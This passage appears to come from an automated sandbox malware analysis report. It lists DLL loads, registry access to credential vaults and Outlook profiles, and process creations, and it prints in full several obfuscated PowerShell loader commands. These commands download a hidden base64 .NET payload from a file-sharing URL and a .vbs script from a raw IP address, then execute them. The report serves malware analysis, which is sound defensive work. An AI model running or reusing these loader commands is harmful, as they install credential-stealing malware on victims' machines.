                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1715998634.0000000007651000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.1993655001.000000000716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1992279886.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbJ source: powershell.exe, 00000003.00000002.1716282823.000000000767A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: aspnet_compiler.pdb source: 31437F.exe.13.dr
                Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.pdb source: powershell.exe, 00000001.00000002.1822805726.00000000059C6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.1993655001.000000000716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1992279886.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.1993655001.000000000716A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000009.00000002.1992279886.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgS